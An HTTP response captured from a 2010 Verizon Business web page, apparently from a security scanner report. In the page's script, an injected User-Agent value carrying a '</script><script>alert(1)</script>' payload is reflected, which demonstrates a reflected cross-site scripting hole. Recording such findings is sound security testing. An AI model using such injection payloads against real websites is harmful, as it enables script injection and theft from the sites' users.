Server: Roxen/4.5.146-release3
ETag: "ffe44cfb6acd89c877b119a0daafdf9e"
Last-Modified: Wed, 17 Nov 2010 01:00:48 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 01:00:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d5734874e-54f3-472a-9fbb-e5f0ab044cf0|VTID%3d65d5aac0-bc1d-4975-8207-80ed788eb255|SX%3d1289956847|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:04:31 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 19:00:48 GMT
Content-Length: 53857

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)de606</script><script>alert(1)</script>8db5382a073";
var q="<q>
...[SNIP]...
